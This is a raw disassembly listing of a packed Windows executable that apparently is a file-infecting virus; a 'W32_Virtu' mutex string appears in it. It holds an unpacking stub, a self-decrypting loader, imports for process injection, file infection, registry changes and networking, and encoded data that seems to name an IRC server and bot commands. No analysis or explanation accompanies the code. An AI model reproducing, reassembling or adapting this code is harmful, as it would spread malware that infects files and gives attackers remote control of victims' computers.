dd 68306F31h, 632E7404h, 3ADD8DE7h, 6506ED0Ah, 22686345h
dd 0BDACF600h, 9B6C1EB0h, 0DA61736Eh, 5775660Fh, 0BDADF0BCh
dd 6EEBFF09h, 0A82E696Bh, 6E740067h, 446DACEDh, 611F206Ah
dd 616B3A3Ch, 0C650D1A1h, 2DAC6D0Ch, 0B6D62FCDh, 65B9ED6h
dd 2A620E71h, 86B6CE41h, 234DF29h, 0B6630B7Ah, 5D0BD8Dh
dd 6E2E70F4h, 735B6917h, 1D602D27h, 78AB7003h, 8E617A0Fh
dd 6C75D28Dh, 0B47029C4h, 0B42BDE5Bh, 0C2A86BC7h, 0F4F9195h
dd 1336CB13h, 0F0633269h, 6F4EFD2Bh, 2E626A2Ch, 617A9BA9h
dd 1F0BA81Eh, 61DB3090h, 66176362h, 0FF6C2ADFh, 6A696867h
dd 6E6D6C6Bh, 0BB6B71B9h, 79787776h, 0A37FF97Fh, 4241F57Ah
dd 46454443h, 4A494847h, 504F4E4Bh, 9535251h, 54FE51E9h
dd 58575655h, 0EF4F5A59h, 607737E1h, 0E9652F0Bh, 7068702Eh
dd 0DAD7023Fh, 0F3D6DF6h, 6E63733Fh, 0DB0C6406h, 4B6DC806h
dd 3D3B76DBh, 74133F88h, 22E8C11Bh, 73C480B2h, 0C2A50285h
dd 0AF3E4701h, 36391E35h, 9449B76Dh, 570F416Fh, 3546657Dh
dd 0A0418565h, 6846BF0Ah, 1621430Ch, 6535CC81h, 0D2BA14B6h
dd 614E2931h, 316C39C6h, 686B149Ch, 1E41C466h, 861544FCh
dd 63D23535h, 8A1F79FDh, 0CB77BC2Dh, 79708509h, 450B6E38h
dd 6B819834h, 73405162h, 683A05A5h, 76705953h, 0D060FE53h
dd 0ED70AD5Ah, 78E194Dh, 12B5A19Bh, 540F9432h, 0CC160381h
dd 182C3535h, 0D87C4E21h, 746D0B60h, 6C727068h, 9B306E65h
dd 653D6ECh, 6E1A7065h, 0B25CF1A3h, 12477520h, 0C57C6A0Bh
dd 7264332Eh, 3A4CC80Fh, 0D78764DAh, 7319BFA7h, 4B4CDA4Dh
dd 0B5D4E705h, 4D48200Dh, 1C480840h, 0B6213B2Fh, 1D59B3ADh
dd 6BFF5470h, 4DB275FCh, 0EF72D61Ch, 41784F4Dh, 9BD96FFDh
dd 0DE0D3844h, 0E66C5DBCh, 7645396Eh, 8F0A62A8h, 87704D45h
dd 52317895h, 0B0DEB405h, 865CFADh, 48653353h, 84D3420Fh
dd 4CEA2FCDh, 270045CEh, 0C7B5B073h, 272C440Dh, 0CDE16157h
dd 15462DB5h, 4F0F4B53h, 1DC06A62h, 49986C38h, 0EB5497Ah
dd 0FAABADB4h, 630A6492h, 0F67EC61Ah, 0D15A364Dh, 4BDE678Dh
dd 0B0457965h, 10773858h, 5E0F64C3h, 51ED0AC2h, 0DB11400Ah
dd 0C059B166h, 10219330h, 1DEDDA30h, 410C516Bh, 42609E62h
dd 8745A153h, 436EC941h, 22DB3899h, 48777406h, 0FB6E3828h
dd 440A1082h, 0D60E6112h, 619BB63Ah, 0DB796669h, 2B754067h
dd 476F6136h, 6F186C1Bh, 18112C79h, 6F6F6770h, 0D8F5210h
dd 5E3D9FE4h, 41146573h, 69757163h, 1D2B9C72h, 5494D36h
dd 0ED4C3AA0h, 0DE131669h, 1CAB6DE8h, 0D1F0D685h, 72688007h
dd 0C7892F5Fh, 2A6E3C5Ch, 7F1E685Fh, 0FC747319h, 7235CE66h
dd 36060D11h, 0D7AB7970h, 0FC8E3D8h, 985CF073h, 10E27AE5h
dd 0CD634603h, 0CC341730h, 0B965B962h, 0B3198C15h, 2C0A14D8h
dd 80B0AD02h, 5C491Bh, 10B90D70h, 66DB34E1h, 24F44F41h
dd 0CB6187DAh, 11515330h, 0C2D80A9Fh, 418555B6h, 6E0D0E11h
dd 140C4258h, 6E6E1D7Dh, 441C3716h, 2C74532Bh, 36D96567h
dd 73FF5215h, 960D0202h, 1965965h, 17346F39h, 6596590Ch
dd 13040959h, 0A3811610h, 50E14027h, 5F2FB945h, 14412F99h
dd 0F540D087h, 10B01E0h, 0B83B3D82h, 1312BE06h, 0B60B1D88h
dd 25CEC6ACh, 0F5020B31h, 65B99D07h, 1E0C506Fh, 9791034h
dd 60781BCh, 6C2BF08Eh, 8C642037h, 1E017C64h, 2B8F43D8h
dd 23015D2Eh, 6230790h, 4AC42436h, 20BEE004h, 642EC7B7h
dd 0FE4FBE9h, 7E8D282Bh, 1627C2DDh, 2DF804C0h, 15h, 1200B698h
dd 0FF0000h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31005000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31006AF2
; ---------------------------------------------------------------------------
align 8
loc_31006AE8: ; CODE XREF: UPX1:loc_31006AF9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31006AEE: ; CODE XREF: UPX1:31006B86�j
; UPX1:31006B9D�j
add ebx, ebx
jnz short loc_31006AF9
loc_31006AF2: ; CODE XREF: UPX1:31006AE0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006AF9: ; CODE XREF: UPX1:31006AF0�j
jb short loc_31006AE8
mov eax, 1
loc_31006B00: ; CODE XREF: UPX1:31006B0F�j
; UPX1:31006B1A�j
add ebx, ebx
jnz short loc_31006B0B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B0B: ; CODE XREF: UPX1:31006B02�j
adc eax, eax
add ebx, ebx
jnb short loc_31006B00
jnz short loc_31006B1C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31006B00
loc_31006B1C: ; CODE XREF: UPX1:31006B11�j
xor ecx, ecx
sub eax, 3
jb short loc_31006B30
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31006BA2
mov ebp, eax
loc_31006B30: ; CODE XREF: UPX1:31006B21�j
add ebx, ebx
jnz short loc_31006B3B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B3B: ; CODE XREF: UPX1:31006B32�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31006B48
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B48: ; CODE XREF: UPX1:31006B3F�j
adc ecx, ecx
jnz short loc_31006B6C
inc ecx
loc_31006B4D: ; CODE XREF: UPX1:31006B5C�j
; UPX1:31006B67�j
add ebx, ebx
jnz short loc_31006B58
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B58: ; CODE XREF: UPX1:31006B4F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31006B4D
jnz short loc_31006B69
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31006B4D
loc_31006B69: ; CODE XREF: UPX1:31006B5E�j
add ecx, 2
loc_31006B6C: ; CODE XREF: UPX1:31006B4A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31006B8C
loc_31006B7D: ; CODE XREF: UPX1:31006B84�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31006B7D
jmp loc_31006AEE
; ---------------------------------------------------------------------------
align 4
loc_31006B8C: ; CODE XREF: UPX1:31006B7B�j
; UPX1:31006B99�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31006B8C
add edi, ecx
jmp loc_31006AEE
; ---------------------------------------------------------------------------
loc_31006BA2: ; CODE XREF: UPX1:31006B2C�j
pop esi
mov edi, esi
mov ecx, 82h
loc_31006BAA: ; CODE XREF: UPX1:31006BB1�j
; UPX1:31006BB6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31006BAF: ; CODE XREF: UPX1:31006BD4�j
cmp al, 1
ja short loc_31006BAA
cmp byte ptr [edi], 1
jnz short loc_31006BAA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31006BAF
lea edi, [esi+4000h]
loc_31006BDC: ; CODE XREF: UPX1:31006BFE�j
mov eax, [edi]
or eax, eax
jz short loc_31006C27
mov ebx, [edi+4]
lea eax, [eax+esi+6000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+608Ch]
xchg eax, ebp
loc_31006BF9: ; CODE XREF: UPX1:31006C1F�j
mov al, [edi]
inc edi
or al, al
jz short loc_31006BDC
mov ecx, edi
jns short near ptr loc_31006C0A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31006C0A: ; CODE XREF: UPX1:31006C02�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+6090h]
or eax, eax
jz short loc_31006C21
mov [ebx], eax
add ebx, 4
jmp short loc_31006BF9
; ---------------------------------------------------------------------------
loc_31006C21: ; CODE XREF: UPX1:31006C18�j
call dword ptr [esi+6094h]
loc_31006C27: ; CODE XREF: UPX1:31006BE0�j
popa
jmp loc_31001D88
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31007000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
pop ebx
call loc_3100725F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:3100720F�j
jmp short near ptr loc_3100720A+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3100725E
call $+5
pop ebp
sub ebp, 402320h
mov eax, [ebp+402367h]
add eax, [ebp+40236Fh]
mov esi, eax
mov eax, [ebp+40236Bh]
add eax, [ebp+40236Fh]
push eax
mov edi, esi
xor ecx, ecx
loc_3100724D: ; CODE XREF: UPX2:3100725C�j
lodsb
xor al, [ebp+402377h]
stosb
inc ecx
cmp ecx, [ebp+402373h]
jl short loc_3100724D
locret_3100725E: ; CODE XREF: UPX2:31007220�j
retn
; ---------------------------------------------------------------------------
loc_3100725F: ; CODE XREF: UPX2:31007201�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], dl
add al, dl
push 0
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 1E003100h, 90680000h, 0E8h, 24048B00h, 242B80F7h, 0
dd 98898000h, 29ACh, 4245C8Bh, 59FC2D74h, 29B0B089h, 0B8890000h
dd 29B4h, 242FB880h, 75E80000h, 3098030Dh, 8B000024h, 33FF025Bh
dd 988B08EBh, 2431h, 555B33FFh, 246C8195h, 8504h, 0E38100h
dd 81FFFFF0h, 401006EDh, 247C8B00h, 3CB58D04h, 0B9004034h
dd 2Bh, 7B81A4F3h, 6968544Eh, 8B0D7573h, 48D3C43h, 38816618h
dd 8744550h, 100EB81h, 0E2750000h, 378508Bh, 20728BD3h
dd 3184A8Bh, 3AD51F3h, 0FF7881C3h, 74654700h, 78811B75h
dd 6F725003h, 81127563h, 64410778h, 9757264h, 650B7881h
dd 74007373h, 59D7E205h, 0C29C35Dh, 24728B24h, 0FF30359h
dd 8B4E04B7h, 0FB031C7Ah, 387348Bh, 0CE8F3h, 6C430000h
dd 4865736Fh, 6C646E61h, 0FF530065h, 3C8589D6h, 0E8004035h
dd 0Dh, 61657243h, 76456574h, 41746E65h, 0D6FF5300h, 35408589h
dd 0DE80040h, 47000000h, 614C7465h, 72457473h, 726F72h
dd 89D6FF53h, 40354485h, 70E800h, 0C0850000h, 0FF502174h
dd 40354495h, 75C08500h, 0D2858D10h, 8A004011h, 6EE8FF50h
dd 0EB000000h, 3C95FF7Ch, 0F7004035h, 40343185h, 0
; ---------------------------------------------------------------------------
xor byte ptr [esi+ebx-73h], 0B5h
xor eax, 8B004034h
jl short loc_31007414
add al, 0A4h
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
pop ebp
retn
; ---------------------------------------------------------------------------
db 5Ah
aJjjj:
unicode 0, <jjjj>
dd 4000168h
; ---------------------------------------------------------------------------
loc_31007414: ; CODE XREF: UPX2:310073EE�j
add [ebx+50006AC4h], cl
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 2
dw 0C933h
dd 0FFFFDAE8h, 0A1958DFFh, 52004011h, 0FF505151h, 40354095h
dd 20C48300h, 0B9F28AC3h, 225Fh, 2401030h, 0C3F9E2D6h
dd 80A5835Ah, 4015h, 1584A583h, 83000040h, 401588A5h, 858B0000h
dd 403431h, 16AC933h, 858F20B1h, 40397Eh, 0E8D1D233h, 0C0C2920Fh
dd 950103E2h, 40397Eh, 0C657EEE2h, 40130385h, 0B5890100h
dd 403548h, 15BBB58Dh, 0C9330040h, 3558BD8Dh, 1EB10040h
dd 35EE8h, 95FF5F00h, 403594h, 0F1FE8C1h, 0D484h, 14478B00h
dd 0C303406Ah, 100068h, 50858908h, 68004035h, 69CEh, 95FF006Ah
dd 4035C8h, 840FC085h, 0FFFFFEF1h, 0B58D97h, 8B004010h
dd 0A74B9EFh, 0ED810000h, 401000h, 1283958Dh, 0A5F30040h
dd 0EC83E2FFh, 6AFC8B20h, 59C03308h, 1A3D958Dh, 0ABF30040h
dd 5789FC8Bh, 1C47FE10h, 36857h, 95FF0001h, 403550h, 8520C483h
dd 0A2840FC0h, 97FFFFFEh, 16A006Ah, 40068h, 6880h, 95FF0001h
dd 403550h, 840FC085h, 0FFFFFE85h, 6850006Ah, 40000h, 0E8C1006Ah
dd 16A570Ch, 16850h, 95FF0001h, 403550h, 1000A68h, 5095FF00h
dd 0E8004035h, 5, 0FFFE54E9h, 59016AFFh, 0A6A0AE3h, 35BC95FFh
dd 0F1EB0040h, 70BD83C3h, 4035h, 0FE37840Fh, 6E8FFFFh
dd 4E000000h, 4C4C4454h, 8895FF00h, 8D004035h, 401773B5h
dd 8DC93300h, 4035D0BDh, 930BB100h, 246E8h, 0F8BD8300h
dd 4035h, 0FE03840Fh, 858BFFFFh, 4035D4h, 8F0170FFh, 40339585h
dd 0E8858B00h, 0FF004035h, 858F0170h, 4033E2h, 35D8858Bh
dd 70FF0040h, 0E9858F01h, 8B004033h, 4035DC8Dh, 0FF09E300h
dd 858F0171h, 4033F6h, 0FFFDF2E8h, 4EBD8DFFh, 8B004036h
dd 0F6006ACFh, 470FFD9h, 6A03E183h, 57F90340h, 186A006Ah
dd 159FB58Dh, 1CB90040h, 8B000000h, 4D048DD4h, 0FFFFFFFEh
dd 48DAB66h, 4Dh, 8DAB6600h, 32AB0447h, 0AB66ACE4h, 6AFBE2h
dd 69CE68h, 6ACC8B00h, 6AC48B00h, 6800h, 406A0800h, 0E6A5251h
dd 0E095FF50h, 58004035h, 6840C483h, 69CEh, 6AD48Bh, 406ACC8Bh
dd 26A006Ah, 68006A52h, 69CEh, 6A51006Ah, 95FF50FFh, 4035E4h
dd 0FF85595Fh, 0FD27840Fh, 0B58DFFFFh, 401000h, 0A74B9h
dd 0F3EF8B00h, 0ED81A5h, 8D004010h, 40144C85h, 8DE0FF00h
dd 4018E095h, 95FF5200h, 40359Ch, 16E8h, 6F6F4C00h, 5070756Bh
dd 69766972h, 6567656Ch, 756C6156h, 50004165h, 354895FFh
dd 85890040h, 40354Ch, 206A5450h, 95FFFF6Ah, 4035ECh, 755FC085h
dd 26A963Fh, 0D48B5656h, 0E852016Ah, 11h, 65446553h, 50677562h
dd 69766972h, 6567656Ch, 95FF5600h, 40354Ch, 5656C48Bh
dd 57565056h, 35D095FFh, 0C4830040h, 95FF5710h, 40353Ch
dd 26A006Ah, 357095FFh, 28B90040h, 97000001h, 0C89E12Bh
dd 0FF575424h, 4035AC95h, 83F63300h, 40363CA5h, 57540000h
dd 35B095FFh, 0C0850040h, 83465C74h, 0EE7204FEh, 82474FFh
dd 2A6A006Ah, 35A895FFh, 0C0850040h, 0E893DC74h, 43Dh
dd 0E391C933h, 3C853930h, 75004036h, 0AEC18128h, 5000000Dh
dd 51565054h, 0FF535050h, 40356895h, 59C08500h, 74FF0F74h
dd 858F0824h, 40363Ch, 0FFFDACE8h, 95FF53FFh, 40353Ch
dd 0C48198EBh, 128h, 3C95FF57h, 0E9004035h, 0FFFFFBE5h
dd 5800498Dh, 0CE005858h, 65000029h, 0Dh, 2 dup(0)
db 0
db 2 dup(0), 51h
dd 95FF5356h, 403548h
; ---------------------------------------------------------------------------
stosd
pop ecx
loc_31007816: ; CODE XREF: UPX2:31007819�j
lodsb
test al, al
jnz short loc_31007816
; ---------------------------------------------------------------------------
aTuBasenamedobj db 'âîÃ\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_31007BA6 proc near ; CODE XREF: UPX2:31007C4D�p
; UPX2:31007C5E�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_31007BA6 endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_31007C89
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_31007C89
mov ecx, [ebp+401588h]
jecxz short loc_31007C41
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_31007C41: ; CODE XREF: UPX2:31007C33�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_31007BA6
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_31007BA6
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_31007BA6
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_31007C89
lea ecx, [edi+23F5h]
call sub_31007BA6
loc_31007C89: ; CODE XREF: UPX2:31007BF3�j
; UPX2:31007C2B�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401A43EDh, 8DFF6A00h, 401A0E95h
dd 0CD525000h, 2A002420h, 0CC48300h, 5485C766h, 0CD00401Ah
dd 5685C720h, 2400401Ah, 5D002A00h, 6A016AC3h, 0FF33FF01h
dd 15FF0473h, 0F074C085h, 0B68h, 5BD08B00h, 8D3C5003h
dd 401A72B5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C783C2EBh, 0D48B570Fh
dd 50CC8B53h, 51406A54h, 0FFFF6A52h, 4035F095h, 0CC48300h
dd 3574958Bh, 0D72B0040h, 0C707EA83h, 0E8006A07h, 3578900h
dd 581A6AC3h, 9E8h, 61428D00h, 75C9FEAAh
db 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_31007D6E proc near ; CODE XREF: sub_310085D9+1B�p
; sub_31008751+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_31007D6E endp
; ---------------------------------------------------------------------------
dw 0E855h
align 8
dd 9ED815Dh, 8B00401Bh, 40364A9Dh, 247C8300h, 840F0008h
dd 0B9h, 208EC81h, 68540000h, 104h, 359095FFh, 0FC8B0040h
dd 424848Dh, 50000001h, 4E8006Ah, 56000000h, 57005452h
dd 358C95FFh, 0C9330040h, 104978Dh, 51510000h, 6A51026Ah
dd 6801h, 0FF524000h, 40355C95h, 0F6859600h, 54505B74h
dd 10468h, 0B4FF5700h, 22024h, 2895FF00h, 59004036h, 1674C085h
dd 8B5014E3h, 52006AD4h, 0FF565751h, 4035CC95h, 0C0855900h
dd 0FF56D075h, 40353C95h, 44578D00h, 446A5752h, 4978D58h
dd 0AB000001h, 106AC033h, 50ABF359h, 50505050h, 0FF525050h
dd 40356495h, 8C48100h, 0FF000002h, 0FF082474h, 40361895h
dd 95FF5300h, 403618h, 4C25Dh, 750A3E80h, 8D8B4601h, 401584h
dd 958D19E3h, 401000h, 0FF56D103h, 0FC084D2h, 11F88h, 10840F00h
dd 80000001h, 10753A3Eh, 3E8046h, 101840Fh, 3E800000h
dd 46F17520h, 49503E81h, 4275474Eh, 46C6CF8Bh, 0CE2B4F01h
dd 51006A51h, 95FF5356h, 403610h, 0FC13B59h, 0DF85h, 0A2858D00h
dd 6A00401Dh, 0C6800h, 53500000h, 361095FFh, 0C3D0040h
dd 0F000000h, 0BF85h, 0B1E900h, 3E810000h, 56495250h, 0A5850Fh
dd 0C6830000h, 0D3CAC08h, 99840Fh, 203C0000h, 3CACF375h
dd 8C850F3Ah, 0AD000000h, 2020200Dh, 67213D20h, 7F757465h
dd 75203CACh, 0FF7E817Ch, 74746820h, 7E817175h, 2F3A7003h
dd 0C668752Fh, 0F00FF47h, 2710BA31h, 0E2F70000h, 0BC95FF52h
dd 33004035h, 505050C0h, 9E850h, 6F440000h, 6F6C6E77h
dd 0FF006461h, 40362095h, 74C08500h, 89C93336h, 40364A85h
dd 685100h, 51800002h, 0FF505651h, 40362495h, 3958D00h
dd 5000401Bh, 5154C933h, 51515250h, 356C95FFh, 4870040h
dd 3C95FF24h, 0F8004035h, 778D80C3h, 1004015h, 4F53C3F9h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
dd 0F0FF0002h, 0D08F7255h, 786F7270h, 692E6D69h, 61676372h
dd 7978616Ch, 6C702Eh, 4B43494Eh, 7A726D20h, 7A727374h
dd 53550A71h, 79205245h, 35303230h, 2E203130h, 3A202E20h
dd 494F4A2Dh, 7626204Eh, 75747269h, 0E8550Ah, 5D000000h
dd 1DB4ED81h, 85C60040h, 401577h, 9495FF00h, 0C1004035h
dd 3C741FE8h, 0B58B1E6Ah, 403550h, 2E3CAC59h, 81662A75h
dd 751DFF3Eh, 40BD8D23h, 8B004036h, 0A5570276h, 858DA566h
dd 40336Ah, 3390858Fh, 89FA0040h, 4E8CFA46h, 1B1FBFEh
dd 43EBCFE2h, 15B1858Dh, 6A500040h, 0FF0E6A00h, 4035A495h
dd 247C8300h, 2B750408h, 4E8h, 43465300h, 8895FF00h, 0E8004035h
dd 0FFFFFC48h, 7E8h, 43465300h, 534F5Fh, 358895FFh, 31E80040h
dd 0E8FFFFFCh, 0FFFFF356h, 13038DFFh, 0BE80040h, 55000000h
dd 33524553h, 4C442E32h, 95FF004Ch, 40359Ch, 0AE8h, 70737700h
dd 746E6972h, 50004166h, 354895FFh, 85890040h, 403554h
dd 8D8D310Fh, 4018E0h, 36468589h, 0FF510040h, 40359C95h
dd 4689300h, 8D000000h, 4018EDB5h, 0BD8D5900h, 40362Ch
dd 0FFF6D6E8h, 85C766FFh, 401D67h, 0A583F0FFh, 401D69h
dd 27958D00h, 5000401Dh, 6A016A54h, 2685200h, 0FF800000h
dd 40363095h, 5AC08500h, 8D8D2275h, 401D5Ah, 8D066A52h
dd 401D67B5h, 50565400h, 0FF525150h, 40363495h, 95FF5800h
dd 40362Ch, 384D85C6h, 0E8000040h, 0Ch, 434F5357h, 2E32334Bh
dd 4C4C44h, 359C95FFh, 68930040h, 7, 1844B58Dh, 8D590040h
dd 4035FCBDh, 0F651E800h, 0CE8FFFFh, 57000000h, 4E494E49h
dd 442E5445h, 0FF004C4Ch, 40359C95h, 0FC08500h, 1E784h
dd 5689300h, 8D000000h, 401882B5h, 0BD8D5900h, 403618h
dd 0FFF61AE8h, 1CBD83FFh, 4036h, 1C2840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 4035FCh, 190C481h, 8B500000h
dd 52006AD4h, 361C95FFh, 0C0850040h, 680D7559h, 1388h
dd 35BC95FFh, 0E2EB0040h, 1D69BD83h, 75000040h, 6D858D29h
dd 5000401Dh, 360895FFh, 0C0850040h, 13B840Fh, 408B0000h
dd 0FF008B0Ch, 69858F30h, 0C600401Dh, 40384D85h, 6A0100h
dd 26A016Ah, 361495FFh, 0F8830040h, 12840FFFh, 93000001h
dd 1D65958Dh, 106A0040h, 95FF5352h, 403604h, 850FC085h
dd 0F2h, 1D86BD8Dh, 8B10040h, 0FFFABCE8h, 9468FFh, 2B5E0000h
dd 243489E6h, 9895FF54h, 8D004035h, 401D94BDh, 0E801B100h
dd 0FFFFFA9Dh, 1024448Bh, 0B08E0C1h, 0C1042444h, 440B08E0h
dd 0E8500824h, 5, 78362E25h, 95FF5700h, 403554h, 0C60CC483h
dd 8D200647h, 401D8195h, 68006A00h, 21h, 95FF5352h, 403610h
dd 14247C8Dh, 5895FF57h, 0C6004035h, 400A3804h, 5750006Ah
dd 1095FF53h, 3004036h, 0A2BD8DE6h, 6A00401Dh, 0C6800h
dd 53570000h, 361095FFh, 0C3D0040h, 75000000h, 4EB58D4Dh
